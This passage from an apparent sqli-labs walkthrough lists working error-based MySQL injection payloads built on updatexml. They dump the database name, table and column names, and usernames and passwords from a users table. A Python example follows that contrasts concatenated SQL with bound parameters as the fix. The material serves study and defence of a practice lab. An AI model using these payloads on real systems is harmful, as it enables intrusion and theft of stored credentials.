Then inject using ' and updatexml(1,concat('~',(【payload】)),1) and '
// Dump the database name:
' and updatexml(1,concat('~',(database())),1) and '
// Dump the table names:
' or updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and '
// Dump the column names:
' or updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and '
// Dump the data:
' or updatexml(1,concat('~',(select * from (select concat_ws('~',id,username,password) from users limit 0,1) a)),1) and '
Note: this only works if the account and password are correct.
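Why the quote-wrapped form above gets parsed as SQL, and how bound parameters stop it, as an added example that is not part of the original walkthrough. Python's sqlite3 stands in for the lab's MySQL (so `updatexml` is simply an unknown function here, not an XPath error), and the `request_log` table, its columns and the helper names are assumptions made for illustration.

```python
import sqlite3

# Constructed sample: the wrapper from the walkthrough, arriving as a request field.
FIELD_VALUE = "' and updatexml(1,concat('~',(database())),1) and '"

def make_db():
    # Hypothetical logging table; the schema is an assumption for this example.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE request_log (field_value TEXT, ip TEXT, username TEXT)")
    return db

def log_concat(db, value, ip, user):
    # Vulnerable pattern: the value is pasted between quotes in the statement text,
    # so a quote inside it closes the string literal and the rest is parsed as SQL.
    sql = ("INSERT INTO request_log (field_value, ip, username) "
           f"VALUES ('{value}', '{ip}', '{user}')")
    db.execute(sql)

def log_bound(db, value, ip, user):
    # Hardened pattern: placeholders fix the statement's shape; the value is data only.
    db.execute(
        "INSERT INTO request_log (field_value, ip, username) VALUES (?, ?, ?)",
        (value, ip, user),
    )

def try_concat(db, value):
    """Return the database error text if the value altered the statement, else None."""
    try:
        log_concat(db, value, "127.0.0.1", "admin")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None

def stored_values(db):
    return [row[0] for row in db.execute("SELECT field_value FROM request_log")]

if __name__ == "__main__":
    db = make_db()
    # The engine tries to call a function named in the field: it was parsed as code.
    print("concatenated:", try_concat(db, FIELD_VALUE))
    # The same bytes are stored verbatim when bound as a parameter.
    log_bound(db, FIELD_VALUE, "127.0.0.1", "admin")
    print("bound:", stored_values(db))
```

On MySQL the concatenated path is what surfaces the `~`-prefixed value in the XPath error text; returning a generic error page instead of the database error removes that channel, but only the bound form removes the injection.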
Less-19
POST - Header Injection - Referer field -Error based